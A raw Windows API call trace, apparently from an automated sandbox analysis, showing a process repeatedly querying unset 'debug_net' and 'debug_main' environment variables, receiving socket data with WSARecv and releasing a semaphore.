	[0114.564] SetLastError (dwErrCode=0x0) 
	[0114.564] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.564] GetLastError () returned 0xcb
	[0114.564] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.564] GetLastError () returned 0xcb
	[0114.564] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d68\x52\x2b0e\x413\x2d6c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.564] GetLastError () returned 0xcb
	[0114.565] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.565] GetLastError () returned 0xcb
	[0114.565] SetLastError (dwErrCode=0x0) 
	[0114.565] SetLastError (dwErrCode=0x0) 
	[0114.565] SetLastError (dwErrCode=0x0) 
	[0114.565] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.565] GetLastError () returned 0xcb
	[0114.565] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.565] GetLastError () returned 0xcb
	[0114.565] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d94\x52\x2b0e\x413\x2d98\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.565] GetLastError () returned 0xcb
	[0114.566] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.566] GetLastError () returned 0xcb
	[0114.566] SetLastError (dwErrCode=0x0) 
	[0114.566] SetLastError (dwErrCode=0x0) 
	[0114.589] SetLastError (dwErrCode=0x0) 
	[0114.589] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.589] GetLastError () returned 0xcb
	[0114.590] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.590] GetLastError () returned 0xcb
	[0114.590] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2dc0\x52\x2b0e\x413\x2dc4\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.590] GetLastError () returned 0xcb
	[0114.590] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.590] GetLastError () returned 0xcb
	[0114.590] SetLastError (dwErrCode=0x0) 
	[0114.591] SetLastError (dwErrCode=0x0) 
	[0114.591] SetLastError (dwErrCode=0x0) 
	[0114.591] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af4c8 | out: lpPreviousCount=0x20af4c8) returned 1
	[0114.592] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.592] GetLastError () returned 0xcb
	[0114.592] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.592] GetLastError () returned 0xcb
	[0114.592] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2dec\x52\x2b0e\x413\x2df0\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.592] GetLastError () returned 0xcb
	[0114.592] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.592] GetLastError () returned 0xcb
	[0114.592] SetLastError (dwErrCode=0x0) 
	[0114.592] SetLastError (dwErrCode=0x0) 
	[0114.592] SetLastError (dwErrCode=0x0) 
	[0114.592] SetLastError (dwErrCode=0x0) 
	[0114.593] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26430a0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x1000, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0114.593] SetLastError (dwErrCode=0x0) 
	[0114.593] SetLastError (dwErrCode=0x0) 
	[0114.593] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.593] GetLastError () returned 0xcb
	[0114.593] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.593] GetLastError () returned 0xcb
	[0114.593] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b00\x52\x2b0e\x413\x2b04\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.593] GetLastError () returned 0xcb
	[0114.593] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.593] GetLastError () returned 0xcb
	[0114.594] SetLastError (dwErrCode=0x0) 
	[0114.594] SetLastError (dwErrCode=0x0) 
	[0114.594] SetLastError (dwErrCode=0x0) 
	[0114.594] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.594] GetLastError () returned 0xcb
	[0114.594] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.594] GetLastError () returned 0xcb
	[0114.594] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.595] GetLastError () returned 0xcb
	[0114.595] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.595] GetLastError () returned 0xcb
	[0114.595] SetLastError (dwErrCode=0x0) 
	[0114.595] SetLastError (dwErrCode=0x0) 
	[0114.595] SetLastError (dwErrCode=0x0) 
	[0114.597] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af3f0 | out: lpPreviousCount=0x20af3f0) returned 1
	[0114.598] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.598] GetLastError () returned 0xcb
	[0114.598] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.598] GetLastError () returned 0xcb
	[0114.598] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af388 | out: lpPreviousCount=0x20af388) returned 1
	[0114.599] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b58\x52\x2b0e\x413\x2b5c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.599] GetLastError () returned 0xcb
	[0114.599] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.599] GetLastError () returned 0xcb
	[0114.599] SetLastError (dwErrCode=0x0) 
	[0114.599] SetLastError (dwErrCode=0x0) 
	[0114.599] SetLastError (dwErrCode=0x0) 
	[0114.599] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.599] GetLastError () returned 0xcb
	[0114.600] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.600] GetLastError () returned 0xcb
	[0114.600] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b84\x52\x2b0e\x413\x2b88\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.600] GetLastError () returned 0xcb
	[0114.600] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.600] GetLastError () returned 0xcb
	[0114.600] SetLastError (dwErrCode=0x0) 
	[0114.600] SetLastError (dwErrCode=0x0) 
	[0114.600] SetLastError (dwErrCode=0x0) 
	[0114.600] SetLastError (dwErrCode=0x0) 
	[0114.601] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x4000, buf=0x2722fd8*)), lpNumberOfBytesRecvd=0x20afbf0*=0x3337, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0114.601] SetLastError (dwErrCode=0x0) 
	[0114.601] SetLastError (dwErrCode=0x0) 
	[0114.601] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.601] GetLastError () returned 0xcb
	[0114.601] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.601] GetLastError () returned 0xcb
	[0114.601] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b00\x52\x2b0e\x413\x2b04\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.601] GetLastError () returned 0xcb
	[0114.601] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.602] GetLastError () returned 0xcb
	[0114.602] SetLastError (dwErrCode=0x0) 
	[0114.602] SetLastError (dwErrCode=0x0) 
	[0114.602] SetLastError (dwErrCode=0x0) 
	[0114.602] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.602] GetLastError () returned 0xcb
	[0114.602] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.602] GetLastError () returned 0xcb
	[0114.602] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.602] GetLastError () returned 0xcb
	[0114.603] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.603] GetLastError () returned 0xcb
	[0114.603] SetLastError (dwErrCode=0x0) 
	[0114.603] SetLastError (dwErrCode=0x0) 
	[0114.603] SetLastError (dwErrCode=0x0) 
	[0114.603] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.603] GetLastError () returned 0xcb
	[0114.603] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.603] GetLastError () returned 0xcb
	[0114.603] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b58\x52\x2b0e\x413\x2b5c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.604] GetLastError () returned 0xcb
	[0114.604] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.604] GetLastError () returned 0xcb
	[0114.604] SetLastError (dwErrCode=0x0) 
	[0114.604] SetLastError (dwErrCode=0x0) 
	[0114.604] SetLastError (dwErrCode=0x0) 
	[0114.604] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.604] GetLastError () returned 0xcb
	[0114.605] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.605] GetLastError () returned 0xcb
	[0114.605] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b84\x52\x2b0e\x413\x2b88\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.605] GetLastError () returned 0xcb
	[0114.605] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.605] GetLastError () returned 0xcb
	[0114.605] SetLastError (dwErrCode=0x0) 
	[0114.605] SetLastError (dwErrCode=0x0) 
	[0114.605] SetLastError (dwErrCode=0x0) 
	[0114.605] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.605] GetLastError () returned 0xcb
	[0114.606] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.606] GetLastError () returned 0xcb
	[0114.606] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2bb0\x52\x2b0e\x413\x2bb4\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.606] GetLastError () returned 0xcb
	[0114.607] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.607] GetLastError () returned 0xcb
	[0114.607] SetLastError (dwErrCode=0x0) 
	[0114.607] SetLastError (dwErrCode=0x0) 
	[0114.607] SetLastError (dwErrCode=0x0) 
	[0114.608] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.608] GetLastError () returned 0xcb
	[0114.608] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.608] GetLastError () returned 0xcb
	[0114.608] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2bdc\x52\x2b0e\x413\x2be0\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.608] GetLastError () returned 0xcb
	[0114.608] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aeee8 | out: lpPreviousCount=0x20aeee8) returned 1
	[0114.609] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.609] GetLastError () returned 0xcb
	[0114.609] SetLastError (dwErrCode=0x0) 
	[0114.609] SetLastError (dwErrCode=0x0) 
	[0114.609] SetLastError (dwErrCode=0x0) 
	[0114.609] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.609] GetLastError () returned 0xcb
	[0114.609] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.610] GetLastError () returned 0xcb
	[0114.610] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c08\x52\x2b0e\x413\x2c0c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.610] GetLastError () returned 0xcb
	[0114.611] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.611] GetLastError () returned 0xcb
	[0114.611] SetLastError (dwErrCode=0x0) 
	[0114.611] SetLastError (dwErrCode=0x0) 
	[0114.611] SetLastError (dwErrCode=0x0) 
	[0114.611] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.611] GetLastError () returned 0xcb
	[0114.611] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.611] GetLastError () returned 0xcb
	[0114.612] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c34\x52\x2b0e\x413\x2c38\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.612] GetLastError () returned 0xcb
	[0114.612] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.612] GetLastError () returned 0xcb
	[0114.612] SetLastError (dwErrCode=0x0) 
	[0114.612] SetLastError (dwErrCode=0x0) 
	[0114.612] SetLastError (dwErrCode=0x0) 
	[0114.612] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.612] GetLastError () returned 0xcb
	[0114.613] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.613] GetLastError () returned 0xcb
	[0114.613] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c60\x52\x2b0e\x413\x2c64\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.613] GetLastError () returned 0xcb
	[0114.613] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af150 | out: lpPreviousCount=0x20af150) returned 1
	[0114.614] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.614] GetLastError () returned 0xcb
	[0114.614] SetLastError (dwErrCode=0x0) 
	[0114.614] SetLastError (dwErrCode=0x0) 
	[0114.614] SetLastError (dwErrCode=0x0) 
	[0114.614] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.614] GetLastError () returned 0xcb
	[0114.614] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.614] GetLastError () returned 0xcb
	[0114.615] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c8c\x52\x2b0e\x413\x2c90\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.615] GetLastError () returned 0xcb
	[0114.616] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.616] GetLastError () returned 0xcb
	[0114.616] SetLastError (dwErrCode=0x0) 
	[0114.616] SetLastError (dwErrCode=0x0) 
	[0114.616] SetLastError (dwErrCode=0x0) 
	[0114.616] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.616] GetLastError () returned 0xcb
	[0114.617] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.617] GetLastError () returned 0xcb
	[0114.617] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2cb8\x52\x2b0e\x413\x2cbc\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.617] GetLastError () returned 0xcb
	[0114.617] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.617] GetLastError () returned 0xcb
	[0114.617] SetLastError (dwErrCode=0x0) 
	[0114.617] SetLastError (dwErrCode=0x0) 
	[0114.617] SetLastError (dwErrCode=0x0) 
	[0114.618] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.618] GetLastError () returned 0xcb
	[0114.618] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.618] GetLastError () returned 0xcb
	[0114.618] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2ce4\x52\x2b0e\x413\x2ce8\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.618] GetLastError () returned 0xcb
	[0114.618] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.618] GetLastError () returned 0xcb
	[0114.619] SetLastError (dwErrCode=0x0) 
	[0114.619] SetLastError (dwErrCode=0x0) 
	[0114.619] SetLastError (dwErrCode=0x0) 
	[0114.619] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.619] GetLastError () returned 0xcb
	[0114.619] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.619] GetLastError () returned 0xcb
	[0114.619] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d10\x52\x2b0e\x413\x2d14\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.619] GetLastError () returned 0xcb
	[0114.622] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.622] GetLastError () returned 0xcb
	[0114.623] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af3c0 | out: lpPreviousCount=0x20af3c0) returned 1
	[0114.625] SetLastError (dwErrCode=0x0) 
	[0114.625] SetLastError (dwErrCode=0x0) 
	[0114.625] SetLastError (dwErrCode=0x0) 
	[0114.625] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af3f8 | out: lpPreviousCount=0x20af3f8) returned 1
	[0114.625] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.625] GetLastError () returned 0xcb
	[0114.626] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.626] GetLastError () returned 0xcb
	[0114.626] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d3c\x52\x2b0e\x413\x2d40\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.626] GetLastError () returned 0xcb
	[0114.626] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af260 | out: lpPreviousCount=0x20af260) returned 1
	[0114.627] SetLastError (dwErrCode=0xcb) 
	[0114.627] GetLastError () returned 0xcb
	[0114.627] SetLastError (dwErrCode=0xcb) 
	[0114.627] GetLastError () returned 0xcb
	[0114.627] SetLastError (dwErrCode=0xcb) 
	[0114.627] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.627] GetLastError () returned 0xcb
	[0114.627] SetLastError (dwErrCode=0x0) 
	[0114.627] SetLastError (dwErrCode=0x0) 
	[0114.627] SetLastError (dwErrCode=0x0) 
	[0114.628] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.628] GetLastError () returned 0xcb
	[0114.628] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.628] GetLastError () returned 0xcb
	[0114.628] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d68\x52\x2b0e\x413\x2d6c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.628] GetLastError () returned 0xcb
	[0114.628] timeGetTime () returned 0x301f8
	[0114.629] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f13c, nSize=0x7fff | out: lpBuffer="\x3ac8\x52\x4bf8\x25b") returned 0x0
	[0114.629] GetLastError () returned 0xcb
	[0114.630] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aef88 | out: lpPreviousCount=0x20aef88) returned 1
